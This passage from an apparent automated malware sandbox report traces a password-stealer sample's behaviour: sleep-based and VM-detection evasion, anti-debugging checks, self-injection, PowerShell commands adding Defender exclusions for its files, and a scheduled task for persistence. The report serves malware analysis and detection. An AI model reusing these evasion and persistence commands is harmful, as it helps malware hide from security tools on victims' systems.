                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -99047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98702s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -98138s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97998s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97782s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -97063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -96938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -96813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -96703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exe TID: 7820Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99745Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99638Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99531Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99418Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99311Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99203Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 99093Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98984Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98874Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98765Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98642Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98500Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98389Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98171Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97952Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97843Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97734Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97624Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97500Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97280Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97171Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 97062Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96952Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96843Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96734Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96624Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96499Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96324Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96218Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96109Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 96000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95890Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95781Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95671Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95562Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95453Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95343Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95234Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95125Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 95015Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99891
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99782
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99657
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99532
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99422
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99313
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99188
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 99047
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98938
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98828
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98702
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98594
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98469
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98359
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98250
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 98138
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97998
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97891
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97782
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97657
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97532
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97422
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97313
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97188
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 97063
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 96938
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 96813
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 96703
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeThread delayed: delay time: 922337203685477
                    Source: lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeCode function: 9_2_030D70A8 CheckRemoteDebuggerPresent,9_2_030D70A8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeMemory written: C:\Users\user\AppData\Roaming\lnYkIr.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lnYkIr.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmp9C71.tmpJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lnYkIr" /XML "C:\Users\user\AppData\Local\Temp\tmpADC6.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lnYkIr.exeProcess created: C:\Users\user\AppData\Roaming\lnYkIr.exe C:\Users\user\AppData\Roaming\lnYkIr.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
